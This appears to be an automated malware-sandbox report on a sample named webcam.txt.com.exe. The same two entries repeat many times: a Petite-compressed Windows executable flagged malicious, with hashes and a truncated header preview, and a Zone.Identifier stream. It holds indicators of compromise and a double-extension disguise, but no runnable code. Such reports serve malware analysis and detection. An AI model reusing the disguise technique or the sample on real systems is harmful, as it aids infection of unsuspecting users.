                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
